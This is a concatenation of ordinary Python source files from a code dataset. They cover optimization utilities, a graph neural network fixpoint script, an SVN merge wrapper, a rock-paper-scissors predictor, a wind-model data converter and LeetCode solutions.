open(result_path+'_initial_samples.pickle', 'rb') as file: \n list_init_pts_value_noise = pickle.load(file)\n new_historical_data = HistoricalData(dim=problem.obj_func_min.getDim())\n count = -1\n repQL = problem.obj_func_min.repQL\n s_min = problem.obj_func_min.getSearchDomain()[0, 0]\n s_max = problem.obj_func_min.getSearchDomain()[0, 1]\n for s in np.linspace(s_min, s_max, num=problem.obj_func_min.getNums()):\n count += 1\n pts_value_noise = list_init_pts_value_noise[count]\n points = pts_value_noise[:, 0:-2]\n vals_array = pts_value_noise[:, -2]\n noise_array = pts_value_noise[:, -1]\n new_historical_data.append_historical_data(points, vals_array, noise_array)\n \n return new_historical_data\n\n# --------------------------------------------------------------------------- #\n# general function for initial data generator #\n# --------------------------------------------------------------------------- #\ndef sample_intial_x_general(problem, num_initial_pts_per_s, points_x, exp_path, result_path):\n list_init_pts_value_noise = []\n new_historical_data = HistoricalData(dim=problem.obj_func_min.getDim())\n repQL = problem.obj_func_min.repQL\n s_min = problem.obj_func_min.getSearchDomain()[0, 0]\n s_max = problem.obj_func_min.getSearchDomain()[0, 1]\n for s in np.linspace(s_min, s_max, num=problem.obj_func_min.getNums()):\n random_seeds = np.random.randint(900, size=num_initial_pts_per_s)\n points = np.hstack((s * np.ones(num_initial_pts_per_s).reshape((-1, 1)), points_x))\n\n vals_array, noise_array = np.zeros(num_initial_pts_per_s), np.zeros(num_initial_pts_per_s)\n i = -1\n for (pt,random_seed) in zip(points, random_seeds):\n i += 1\n value, noise_array[i] = problem.obj_func_min.evaluate(repQL, pt, random_seed, exp_path)\n vals_array[i] = -1.0*value\n\n new_historical_data.append_historical_data(points, vals_array, noise_array)\n\n pts_value_noise = np.hstack(( points, vals_array.reshape((-1,1)), noise_array.reshape((-1,1)) ))\n list_init_pts_value_noise.append(pts_value_noise)\n with open(result_path+'_initial_samples.txt', \"w\") as file: \n file.write(str(list_init_pts_value_noise))\n with open(result_path+'_initial_samples.pickle', \"wb\") as file: \n dump(np.array(list_init_pts_value_noise), file)\n # print(list_init_pts_value_noise)\n return new_historical_data\n\n# --------------------------------------------------------------------------- #\n# different constraints on generating initial data #\n# --------------------------------------------------------------------------- #\ndef sample_initial_x_uniform(problem, num_per_var, exp_path, result_path):\n # np.random.seed(1)\n var_dim = int(problem.obj_func_min.getDim()) - 1\n num_initial_pts_per_s = int(num_per_var * var_dim)\n points_x = problem.obj_func_min.get_moe_domain().generate_uniform_x_points_in_domain(num_initial_pts_per_s)\n new_historical_data = sample_intial_x_general(problem, num_initial_pts_per_s, points_x, exp_path, result_path)\n return new_historical_data\n\ndef sample_initial_f1f2_closer_f1_further_f2(problem, num_per_var, exp_path, result_path):\n ''' flag 1 is closer to the start than flag 2 '''\n # np.random.seed(1)\n var_dim = int(problem.obj_func_min.getDim()) - 1\n num_initial_pts_per_s = int(num_per_var * var_dim)\n points_x = problem.obj_func_min.get_moe_domain().generate_closer_f1_further_f2(num_initial_pts_per_s)\n new_historical_data = sample_intial_x_general(problem, num_initial_pts_per_s, points_x, exp_path, result_path)\n return new_historical_data\n\ndef sample_initial_f1f2_higher_f1_lower_f2(problem, 
num_per_var, exp_path, result_path):\n ''' y(f1) <= y(f2) '''\n # np.random.seed(1)\n var_dim = int(problem.obj_func_min.getDim()) - 1\n num_initial_pts_per_s = int(num_per_var * var_dim)\n points_x = problem.obj_func_min.get_moe_domain().generate_higher_f1_lower_f2(num_initial_pts_per_s)\n new_historical_data = sample_intial_x_general(problem, num_initial_pts_per_s, points_x, exp_path, result_path)\n return new_historical_data\n\n\n\n# ================================================================================================= #\n# select start points #\n# ================================================================================================= #\n\n# --------------------------------------------------------------------------- #\n# general function for selecting start points #\n# --------------------------------------------------------------------------- #\ndef select_startpts_general(s, list_sampled_points, pt_x_to_start_from, num_multistart, problem):\n '''\n create starting points for BFGS, first select points from previously sampled points,\n but not more than half of the starting points\n :return: numpy array with starting points for BFGS\n '''\n if len(list_sampled_points) > 0:\n indices_chosen = np.random.choice(len(list_sampled_points), \n int(min(len(list_sampled_points), num_multistart/2.-1.)), \n replace=False)\n start_pts_x = np.array(list_sampled_points)[:,1:][indices_chosen]\n start_pts_x = np.vstack((pt_x_to_start_from, start_pts_x)) # add the point that will be sampled next\n else:\n start_pts_x = [pt_x_to_start_from]\n return start_pts_x\n\n# --------------------------------------------------------------------------- #\n# different constraints on selecting start points #\n# --------------------------------------------------------------------------- #\ndef select_startpts_x_BFGS(s, list_sampled_points, pt_x_to_start_from, num_multistart, problem):\n start_pts_x = select_startpts_general(s, list_sampled_points, pt_x_to_start_from, num_multistart, problem)\n # fill up with points from an LHS\n random_pts_x = problem.obj_func_min.get_moe_domain().generate_uniform_x_points_in_domain(num_multistart-len(start_pts_x))\n start_pts_x = np.vstack((start_pts_x, random_pts_x))\n return start_pts_x\n\ndef select_startpts_f1closer_BFGS(s, list_sampled_points, pt_x_to_start_from, num_multistart, problem):\n start_pts_x = select_startpts_general(s, list_sampled_points, pt_x_to_start_from, num_multistart, problem)\n random_pts_x = problem.obj_func_min.get_moe_domain().generate_closer_f1_further_f2(num_multistart-len(start_pts_x))\n start_pts_x = np.vstack((start_pts_x, random_pts_x))\n return start_pts_x\n\ndef select_startpts_f1higher_BFGS(s, list_sampled_points, pt_x_to_start_from, num_multistart, problem):\n start_pts_x = select_startpts_general(s, list_sampled_points, pt_x_to_start_from, num_multistart, problem)\n random_pts_x = problem.obj_func_min.get_moe_domain().generate_higher_f1_lower_f2(num_multistart-len(start_pts_x))\n start_pts_x = np.vstack((start_pts_x, random_pts_x))\n return start_pts_x\n\n\n\n# ================================================================================================= #\n# process_parallel_results #\n# ================================================================================================= #\ndef process_parallel_results(parallel_results):\n inner_min = np.inf\n for result in parallel_results:\n if inner_min > result[1]:\n inner_min = result[1]\n inner_min_point = result[0]\n return inner_min, 
inner_min_point","sub_path":"multifidelity_KG_REP/misokg_utils_sep.py","file_name":"misokg_utils_sep.py","file_ext":"py","file_size_in_byte":8765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"320091730","text":"if __name__ != \"__main__\":\n exit(-1)\n\nimport sys, json\nfrom matplotlib import pyplot\n\ntarget = sys.argv[1]\ndata = json.loads(sys.argv[2])\nkws = data['keys']\nno = data['no']\n\nfig, ax = pyplot.subplots()\nax.plot(list(kws.keys()), list(kws.values()))\nax.grid()\nax.set(label=f\"Graph {no}\")\n\nwith open(target, \"wb\") as f:\n fig.savefig(f)\n\npyplot.close(fig)\n","sub_path":"mathparser/_graph.py","file_name":"_graph.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"212141558","text":"import json\n\n\ndef test_basic():\n\n # str => json\n content = '{\"accessToken\": \"521de21161b23988173e6f7f48f9ee96e28\", \"User-Agent\": \"Apache-HttpClient/4.5.2 (Java/1.8.0_131)\"}'\n res = json.loads(content)\n print('res type %s' % type(res))\n print(res)\n\n\n # json => str\n json_content = {\"accessToken\": \"521de21161b23988173e6f7f48f9ee96e28\", \"User-Agent\": \"Apache-HttpClient/4.5.2 (Java/1.8.0_131)\"}\n res_str = json.dumps(json_content)\n\n print('res_str %s' % type(res_str))\n print(res_str)\n\n\n\nif __name__ == '__main__':\n\n test_basic()","sub_path":"Python35/PythonSyntax/objects/test_json.py","file_name":"test_json.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"44715715","text":"from src.utils.dataset import load_dataset\nfrom src.utils.train_model import train_cora_reddit, train_ppi, train_tu, evaluate_tu, evaluate_ppi, evaluate_cora_reddit\nfrom src.utils.train_model import load_parameters\nfrom src.utils.optimize import optimize_graph_cora_reddit_ppi, optimize_graph_tu, optimize_node_cora_reddit_ppi, optimize_node_tu\nfrom src.utils.newton_method import newton_method_cora_reddit_ppi, newton_method_tu\nfrom src.utils.broyden_method import broyden_method_cora_reddit_ppi, broyden_method_tu\nfrom src.models.slp_gcn import SLP_GCN_4node, SLP_GCN_4graph\nfrom src.models.slp import SLP\nfrom src.models.gcn import GCN\nfrom src.models.last_layer import Last_Layer_4graph, Last_Layer_4node\n\nimport argparse\nimport torch\nimport yaml\nimport os\nimport numpy as np\nimport random\nimport torch.nn as nn\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nprint(\"RUNNING ON: {}\".format(device))\n\ndef fix_random_seed(seed=0):\n if torch.cuda.is_available():\n torch.cuda.manual_seed(seed)\n else:\n torch.manual_seed(seed)\n np.random.seed(seed)\n random.seed(seed)\n os.environ['PYTHONHASHSEED'] = str(seed)\n\ndef main(args):\n\n # fix random seed if True\n if args.fix_random:\n fix_random_seed()\n\n # check if 'outputs' and 'checkpoints' directory exist, if not create\n outputs_dir = os.path.join(os.getcwd(), '../outputs')\n checkpoints_dir = os.path.join(os.getcwd(), '../checkpoints')\n if not os.path.exists(outputs_dir):\n os.makedirs(outputs_dir)\n if not os.path.exists(checkpoints_dir):\n os.makedirs(checkpoints_dir)\n\n # load dataset\n print(\"********** LOAD DATASET **********\")\n if args.dataset in 'cora, reddit-self-loop':\n g, features, labels, train_mask, test_mask = load_dataset(args)\n elif args.dataset == 'ppi':\n train_dataset, valid_dataset, train_dataloader, valid_dataloader 
= load_dataset(args)\n elif 'tu' in args.dataset:\n statistics, train_dataset, valid_dataset, train_dataloader, valid_dataloader = load_dataset(args)\n\n # build network\n print(\"********** BUILD NETWORK **********\")\n path = '../configs/' + args.dataset + '.yaml'\n config_file = os.path.join(os.getcwd(), path)\n with open(config_file, 'r') as f:\n config = yaml.load(f, Loader=yaml.FullLoader)\n h_feats = config['hidden_features']\n\n if args.dataset in 'cora, reddit-self-loop':\n in_feats = features.shape[1]\n out_feats = torch.max(labels).item() + 1\n elif args.dataset == 'ppi':\n in_feats = train_dataset.features.shape[1]\n out_feats = train_dataset.labels.shape[1]\n elif 'tu' in args.dataset:\n in_feats = statistics[0]\n out_feats = statistics[1].item()\n\n if 'tu' not in args.dataset:\n slp_gcn = SLP_GCN_4node(in_feats, h_feats, out_feats).to(device)\n else:\n slp_gcn = SLP_GCN_4graph(in_feats, h_feats, out_feats).to(device)\n\n if args.train: # need to train the network\n print(\"********** TRAIN NETWORK **********\")\n if args.dataset in 'cora, reddit-self-loop':\n train_cora_reddit(slp_gcn, g, features, labels, train_mask, test_mask, args)\n elif args.dataset == 'ppi':\n train_ppi(slp_gcn, train_dataloader, valid_dataloader, args)\n elif 'tu' in args.dataset:\n train_tu(slp_gcn, train_dataloader, valid_dataloader, args)\n\n checkpoint_path = '../checkpoints/slp_gcn_' + args.dataset + '.pkl'\n checkpoint_file = os.path.join(os.getcwd(), checkpoint_path)\n torch.save(slp_gcn.state_dict(), checkpoint_file)\n\n else:\n checkpoint_path = '../checkpoints/slp_gcn_' + args.dataset + '.pkl'\n checkpoint_file = os.path.join(os.getcwd(), checkpoint_path)\n slp_gcn.load_state_dict(torch.load(checkpoint_file, map_location=device))\n\n # reduce/increase dimension of training set\n print(\"********** PREPROCESS FEATURES FOR TRAINING SET **********\")\n slp = SLP(in_feats, h_feats).to(device)\n model_dict = load_parameters(checkpoint_file, slp)\n slp.load_state_dict(model_dict)\n slp.eval()\n with torch.no_grad():\n if args.dataset in 'cora, reddit-self-loop':\n features_reduced = slp(features)\n elif args.dataset == 'ppi':\n features = torch.from_numpy(train_dataset.features).to(device)\n features_reduced = slp(features.float())\n elif 'tu' in args.dataset:\n train_dataset_reduced = train_dataset\n for data in train_dataset_reduced:\n data[0].ndata['feat'] = slp(data[0].ndata['feat'].float().to(device))\n\n # GCN\n gcn = GCN(h_feats).to(device)\n model_dict = load_parameters(checkpoint_file, gcn)\n gcn.load_state_dict(model_dict)\n\n # Find fixpoint for training set\n print(\"********** FIND FIXPOINT FOR TRAINING SET **********\")\n if args.method == 'graph_optimization':\n print(\"********** OPTIMIZATION ON WHOLE GRAPH **********\")\n if args.dataset in 'cora, reddit-self-loop':\n H, min_cost_func = optimize_graph_cora_reddit_ppi(gcn, g, features_reduced, args, save=True)\n elif args.dataset == 'ppi':\n H, min_cost_func = optimize_graph_cora_reddit_ppi(gcn, train_dataset.graph, features_reduced, args, save=True)\n elif 'tu' in args.dataset:\n H, found_indices, min_cost_func = optimize_graph_tu(gcn, train_dataset_reduced, args, save=True)\n elif args.method == 'node_optimization':\n print(\"********** OPTIMIZATION ON EACH NODE **********\")\n if args.dataset in 'cora, reddit-self-loop':\n H, found_indices = optimize_node_cora_reddit_ppi(gcn, g, features_reduced, args)\n elif args.dataset == 'ppi':\n H, found_indices = optimize_node_cora_reddit_ppi(gcn, train_dataset.graph, features_reduced, 
args)\n elif 'tu' in args.dataset:\n H, found_indices = optimize_node_tu(gcn, train_dataset_reduced, args)\n elif args.method == 'newton_method':\n print(\"********** NEWTON'S METHOD **********\")\n if args.dataset in 'cora, reddit-self-loop':\n H, min_cost_func = newton_method_cora_reddit_ppi(gcn, g, features_reduced, args, save=True)\n elif args.dataset == 'ppi':\n H, min_cost_func = newton_method_cora_reddit_ppi(gcn, train_dataset.graph, features_reduced, args, save=True)\n elif 'tu' in args.dataset:\n H, found_indices, min_cost_func = newton_method_tu(gcn, train_dataset_reduced, args, save=True)\n elif 'broyden' in args.method:\n print(\"********** BROYDEN'S METHOD **********\")\n if args.dataset in 'cora, reddit-self-loop':\n H, min_cost_func = broyden_method_cora_reddit_ppi(gcn, g, features_reduced, args, save=True)\n elif args.dataset == 'ppi':\n H, min_cost_func = broyden_method_cora_reddit_ppi(gcn, train_dataset.graph, features_reduced, args, save=True)\n elif 'tu' in args.dataset:\n H, found_indices, min_cost_func = broyden_method_tu(gcn, train_dataset_reduced, args, save=True)\n\n # Save result\n H_path = '../outputs/H_' + args.dataset + '_' + args.method + '.pkl'\n H_file = os.path.join(os.getcwd(), H_path)\n torch.save(H, H_file)\n cost_func_path = '../outputs/cost_func_' + args.dataset + '_' + args.method + '.pkl'\n cost_func_file = os.path.join(os.getcwd(), cost_func_path)\n torch.save(min_cost_func, cost_func_file)\n if 'tu' in args.dataset:\n indices_path = '../outputs/indices_' + args.dataset + '_' + args.method + '.pkl'\n indices_file = os.path.join(os.getcwd(), indices_path)\n torch.save(found_indices, indices_file)\n\n # Test fixpoint's performance in classification\n if args.test:\n print(\"********** TEST OF FIXPOINT **********\")\n # Reduce/increase dimension of validation set\n print(\"********** PREPROCESS FEATURES FOR VALIDATION SET **********\")\n slp.eval()\n with torch.no_grad():\n if args.dataset == 'ppi':\n features_val = torch.from_numpy(valid_dataset.features).to(device)\n features_reduced_val = slp(features_val.float())\n elif 'tu' in args.dataset:\n valid_dataset_reduced = valid_dataset\n for data in valid_dataset_reduced:\n data[0].ndata['feat'] = slp(data[0].ndata['feat'].float().to(device))\n\n # Find fixpoint for validation set\n print(\"********** FIND FIXPOINT FOR VALIDATION SET **********\")\n if args.method == 'graph_optimization':\n print(\"********** OPTIMIZATION ON WHOLE GRAPH **********\")\n if args.dataset == 'ppi':\n H_val, min_cost_func_val = optimize_graph_cora_reddit_ppi(gcn, valid_dataset.graph, features_reduced_val, args)\n elif 'tu' in args.dataset:\n H_val, found_indices_val, min_cost_func_val = optimize_graph_tu(gcn, valid_dataset_reduced, args)\n elif args.method == 'node_optimization':\n print(\"********** OPTIMIZATION ON EACH NODE **********\")\n if args.dataset == 'ppi':\n H_val, found_indices_val = optimize_node_cora_reddit_ppi(gcn, valid_dataset.graph, features_reduced_val, args)\n elif 'tu' in args.dataset:\n H_val, found_indices_val = optimize_node_tu(gcn, valid_dataset_reduced, args)\n elif args.method == 'newton_method':\n print(\"********** NEWTON'S METHOD **********\")\n if args.dataset == 'ppi':\n H_val, min_cost_func_val = newton_method_cora_reddit_ppi(gcn, valid_dataset.graph, features_reduced_val, args)\n elif 'tu' in args.dataset:\n H_val, found_indices_val, min_cost_func_val = newton_method_tu(gcn, valid_dataset_reduced, args)\n elif 'broyden' in args.method:\n print(\"********** BROYDEN'S METHOD **********\")\n if 
args.dataset == 'ppi':\n H_val, min_cost_func_val = broyden_method_cora_reddit_ppi(gcn, valid_dataset.graph, features_reduced_val, args)\n elif 'tu' in args.dataset:\n H_val, found_indices_val, min_cost_func_val = broyden_method_tu(gcn, valid_dataset_reduced, args)\n\n # Build last layer\n print(\"********** BUILD LAST LAYER **********\")\n if 'tu' in args.dataset:\n last_layer = Last_Layer_4graph(h_feats, out_feats)\n model_dict = load_parameters(checkpoint_file, last_layer)\n last_layer.load_state_dict(model_dict)\n else:\n last_layer = Last_Layer_4node(h_feats, out_feats)\n model_dict = load_parameters(checkpoint_file, last_layer)\n last_layer.load_state_dict(model_dict)\n\n # Train last layer\n print(\"********** TRAIN LAST LAYER **********\")\n if 'tu' in args.dataset:\n for graph_idx, (graph, graph_label) in enumerate(train_dataset):\n graph.ndata['feat'] = H[graph_idx]\n for graph_idx, (graph, graph_label) in enumerate(valid_dataset):\n graph.ndata['feat'] = H_val[graph_idx]\n train_tu(last_layer, train_dataloader, valid_dataloader, args)\n elif args.dataset in 'cora, reddit-self-loop':\n train_cora_reddit(slp_gcn, g, H, labels, train_mask, test_mask, args)\n elif args.dataset == 'ppi':\n train_dataset.features = H\n valid_dataset.features = H_val\n train_ppi(slp_gcn, train_dataloader, valid_dataloader, args)\n\nif __name__ == '__main__':\n\n # get parameters\n parser = argparse.ArgumentParser(description=\"Try to find fixpoint\")\n\n parser.add_argument('dataset', help='choose dataset from: cora, reddit-self-loop, ppi, aids, reddit-binary and imdb-binary')\n parser.add_argument('method', help='choose method from: graph_optimization, node_optimization and newton_method')\n parser.add_argument('--train', action='store_true', help='set true if model needs to be trained, i.e. no checkpoint available')\n parser.add_argument('--fix_random', action='store_true', help='set true if repeatability required')\n parser.add_argument('--test', action='store_true', help='set true to test fixpoint\\'s performance in classification task' )\n args = parser.parse_args()\n\n print(args)\n main(args)\n print(\"Finish!\")\n\n","sub_path":"src/run/fixpoint.py","file_name":"fixpoint.py","file_ext":"py","file_size_in_byte":12278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"335893980","text":"#!/usr/bin/env python\nimport sys\nimport os\n\n# Configure your favorite three-way diff program here.\n#DIFF3 = \"/usr/local/bin/my-diff3-tool\"\nDIFF3 = \"/home/justin/Public/p4v/bin/p4merge\"\n\n# Subversion provides the paths we need as the last three parameters.\nMINE = sys.argv[-3]\nOLDER = sys.argv[-2]\nYOURS = sys.argv[-1]\n\nR_LABEL = sys.argv[4]\nB_LABEL= sys.argv[6]\nL_LABEL = sys.argv[8]\n\n# Call the three-way diff command (change the following line to make\n# sense for your three-way diff program).\ncmd = [DIFF3, \"-nl\", L_LABEL, \"-nb\", B_LABEL, \"-nr\", R_LABEL, \"-nm\", \"Merged\", OLDER, YOURS, MINE, MINE]\nos.execv(cmd[0], cmd)\n\n# After performing the merge, this script needs to print the contents\n# of the merged file to stdout. Do that in whatever way you see fit.\n# Return an errorcode of 0 on successful merge, 1 if unresolved conflicts\n# remain in the result. 
Any other errorcode will be treated as fatal.\nsys.stdout.write(MINE)\n","sub_path":"diff3-svn-wrapper.py","file_name":"diff3-svn-wrapper.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"354145242","text":"# 746. Min Cost Climbing Stairs https://leetcode.com/problems/min-cost-climbing-stairs/\n\nclass Solution(object):\n def minCostClimbingStairs(self, cost):\n \"\"\"\n :type cost: List[int]\n :rtype: int\n \"\"\"\n cost0, cost1 = cost[0], cost[1]\n # cost.append(0)\n for item in cost[2:]:\n cost0, cost1 = cost1, min(cost0, cost1) + item\n\n return min(cost0, cost1)\n\n#100%\n\nclass Solution(object):\n def minCostClimbingStairs(self, cost):\n \"\"\"\n :type cost: List[int]\n :rtype: int\n \"\"\"\n # if len(cost) <=2:\n # return 0\n cost.append(0)\n for i in range(2, len(cost)):\n cost[i] = cost[i] + min(cost[i - 1], cost[i - 2])\n\n return cost[-1]\n#98%","sub_path":"src/MinCostClimbingStairsDP.py","file_name":"MinCostClimbingStairsDP.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"300515925","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 8 18:36:40 2019\n\n@author: kouhei\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport random\nimport csv\nimport chainer\nfrom chainer import serializers, Chain ,Variable\nimport chainer.functions as F\nimport chainer.links as L\nmodelflag = False\ntime = 1\nb4 = 4\nbb4 = 4\nbbb4 = 4\nbbbb4 = 4\nbbbbb4 = 4\nbbbbbb4 = 4\neb4 = 2\nebb4 = 2\nebbb4 = 2\n\nclass MyChain(Chain):\n def __init__(self):\n super(MyChain, self).__init__(\n l1=L.Linear(9, 30),\n l2=L.Linear(30, 30),\n l3=L.Linear(30, 3),\n )\n def __call__(self, x):\n h1 = F.sigmoid(self.l1(x))\n h2 = F.sigmoid(self.l2(h1))\n h3 = self.l3(h2)\n return h3\nmodel = L.Classifier(MyChain())\nwhile modelflag == False:\n try:\n modelname = input('model name?')\n if modelname == \"exit\":\n exit()\n modelname = str(modelname)\n serializers.load_npz(modelname, model)\n modelflag = True\n except:\n print('that model does not exist!')\ncsvname = \"fortestlog.csv\"\ntry:\n open(csvname, 'x')\nexcept:\n pass\n#with open(csvname, 'a') as csvFile:\n #fieldnames = ['b4', 'bb4','bbb4','bbbb4','bbbbb4','bbbbbb4','eb4','ebb4','ebbb4']\n #writer = csv.DictWriter(csvFile, fieldnames=fieldnames)\n #writer.writeheader()\nwhile True:\n while time <= 9:\n comphand = random.randint(0, 2)\n handcheck = False\n print('computer prediction is : '+str(comphand))\n while handcheck == False:\n hand = input('input hand>>>')\n try:\n hand = int(hand)\n if hand == 0:\n handcheck = True\n elif hand == 1:\n handcheck = True\n hand = 0.5\n elif hand == 2:\n handcheck = True\n hand = 1\n else:\n print('input with 0,1 or 2 !!')\n except:\n print('input with 0,1 or 2 !!')\n handcheck = False\n comphand = comphand/2\n \n time = time + 1\n ebbb4 = ebb4\n ebb4 = eb4\n eb4 = comphand\n bbbbbb4 = bbbbb4\n bbbbb4 = bbbb4\n bbbb4 = bbb4\n bbb4 = bb4\n bb4 = b4\n b4 = hand\n while time >= 10:\n with open(csvname,'w') as csvFile:\n writer = csv.writer(csvFile)\n list1 = ['b4','bb4','bbb4','bbbb4','bbbbb4','bbbbbb4','eb4','ebb4','ebbb4']\n list2 = [b4,bb4,bbb4,bbbb4,bbbbb4,bbbbbb4,eb4,ebb4,ebbb4]\n writer.writerow(list1)\n writer.writerow(list2)\n csvFile.close()\n df = pd.read_csv(csvname)\n df = df.tail(1)\n #df.iloc[:,:] /= df.iloc[:,:].max()\n data = np.array(df.iloc[:,:]).astype(np.float32)\n 
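# model is an L.Classifier wrapper, so model.predictor is the underlying MyChain;\n # calling it returns a chainer.Variable whose raw scores live in .data, and\n # np.argmax picks the predicted human hand; the mapping below then chooses the\n # counter-move (assuming the 0/1/2 hand encoding used during training).\n 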
outputArray = model.predictor(chainer.Variable(data))\n print(outputArray)\n outputArray = outputArray.data\n outputArray = np.argmax(outputArray)\n if outputArray == 0:\n comphand = 2\n if outputArray == 1:\n comphand = 0\n if outputArray == 2:\n comphand = 1\n #ansArray = np.argmax(outputArray, axis=1)\n handcheck = False\n print('computer prediction is : '),\n print(comphand)\n while handcheck == False:\n hand = input('input hand>>>')\n try:\n if hand == \"exit\":\n exit()\n hand = int(hand)\n if hand == 0:\n handcheck = True\n elif hand == 1:\n handcheck = True\n elif hand == 2:\n handcheck = True\n else:\n print('input with 0,1 or 2 !!')\n except:\n print('input with 0,1 or 2 !!')\n handcheck = False\n time = time + 1\n ebbb4 = ebb4\n ebb4 = eb4\n eb4 = comphand\n bbbbbb4 = bbbbb4\n bbbbb4 = bbbb4\n bbbb4 = bbb4\n bbb4 = bb4\n bb4 = b4\n b4 = hand\n\"\"\"\n outputDF = pd.DataFrame(outputArray,columns=[\"output_0\",\"output_1\",\"output_2\"])\n\n ansDF = pd.DataFrame(ansArray,columns=[\"PredictedValue\"])\n\n result = pd.concat([df.disease,ansDF,outputDF],axis=1)\n\n correctCount = len(np.where(result.iloc[:,0] == result.iloc[:,1])[0])\n correctRate = correctCount/N\n print(\"Number of samples:\",N)\n print(\"Number correct:\",correctCount)\n print(\"Accuracy:\",correctRate)\n \n #write the results to a csv file\n result.to_csv(\"samplePredict.csv\",index=False)\n\"\"\"\n\n","sub_path":"janken_predict3.py","file_name":"janken_predict3.py","file_ext":"py","file_size_in_byte":4722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
{"seq_id":"573693156","text":"#!/usr/bin/env python\n\"\"\"\nCSV data to windini_N.asc\n\"\"\"\nimport os\nimport shutil\nimport pandas as pd\nimport argparse\n\nHDWM_OPT = os.environ['HDWM_OPT']\nHDWM_OPT_DATA = os.environ['HDWM_OPT_DATA']\nOUTPUT = os.environ['OUTPUT']\nOUTPUT_FILE = os.environ['OUTPUT_FILE']\n\ndef run(path_datos, path_stations):\n \"\"\"dataframe in csv format, datum WGS84, epsg:4326:\n header: date,lat,lon,name,wind_dir,wind_speed\n \"\"\"\n data = pd.read_csv(path_datos, parse_dates=['date'])\n name_path_datos, extension_file = path_datos.split(\"/\").pop().split(\".\")\n stations = pd.read_csv(path_stations)\n stations['lat'] = stations['lat'].astype(str)\n stations['lon'] = stations['lon'].astype(str)\n HEIGHT = 10\n data['height'] = HEIGHT\n data = data.sort_values('date')\n N = data.groupby('date')\n hdwind = pd.DataFrame()\n\n for name, group in N:\n with open('windini_0.asc', 'w') as f:\n f.write('ReferenceSystem 1' + '\\n')\n f.write('InputPoints ' + str(len(group)) + '\\n')\n for index, input_data in group.iterrows():\n f.write(\n str(input_data.lat) + ' ' + str(input_data.lon) + ' ' +\n str(input_data.height) + ' ' + str(input_data.wind_speed) +\n ' ' + str(input_data.wind_dir) + '\\n')\n\n f.write('OutputLayers 1' + '\\n' + '10' + '\\n')\n f.write('OutputPoints ' + str(stations.shape[0]) + '\\n')\n for station in stations.itertuples():\n f.write(\n str(station.lat) + ' ' + str(station.lon) + ' ' +\n str(10) + '\\n')\n os.remove(HDWM_OPT_DATA + '/windini_0.asc')\n shutil.move('windini_0.asc', HDWM_OPT_DATA)\n os.system(HDWM_OPT + \"/HDWM\")\n df = pd.read_csv(OUTPUT_FILE)\n df['date'] = name\n df['lat'] = df['lat'].astype(str)\n df['lon'] = df['lon'].astype(str)\n df = pd.merge(df, stations, how='left', on=['lat', 'lon'])\n hdwind = hdwind.append(df)\n hdwind.to_csv(name_path_datos+'-HDWM.csv', index=False)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n prog='data-HDWind-data', description='input data to 
HDWM model and output data')\n parser.add_argument('-d', default=os.getcwd(),\n help='dir to input data csv ')\n parser.add_argument('-s', help='csv with stations data: lon,lat,name')\n args = parser.parse_args()\n run(args.d, args.s)\n","sub_path":"dataModeled/HDWind.py","file_name":"HDWind.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
{"seq_id":"147409976","text":"'''\n@Description: \n@version: \n@Author: chenhao\n@Date: 2020-02-29 22:49:31\n@LastEditors: chenhao\n@LastEditTime: 2020-02-29 23:29:59\n'''\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution:\n # Recursion\n def mergeTrees(self, t1: TreeNode, t2: TreeNode) -> TreeNode:\n if not t1 and not t2:\n return None\n \n if t1 is None and t2:\n return t2\n elif t1 and t2 is None:\n return t1\n \n t1.val += t2.val\n t1.left = self.mergeTrees(t1.left, t2.left)\n t1.right = self.mergeTrees(t1.right, t2.right)\n \n return t1\n \n \n # Iterative Method\n def mergeTrees2(self, t1: TreeNode, t2: TreeNode) -> TreeNode:\n if not (t1 and t2):\n return t2 if not t1 else t1\n \n queue = [(t1, t2)]\n while queue:\n r1, r2 = queue.pop(0)\n r1.val += r2.val\n if r1.left and r2.left:\n queue.append((r1.left, r2.left))\n elif not r1.left:\n r1.left = r2.left\n if r1.right and r2.right:\n queue.append((r1.right, r2.right))\n elif not r1.right:\n r1.right = r2.right\n return t1","sub_path":"4_Tree/Recursion/617. Merge Two Binary Trees.py","file_name":"617. Merge Two Binary Trees.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
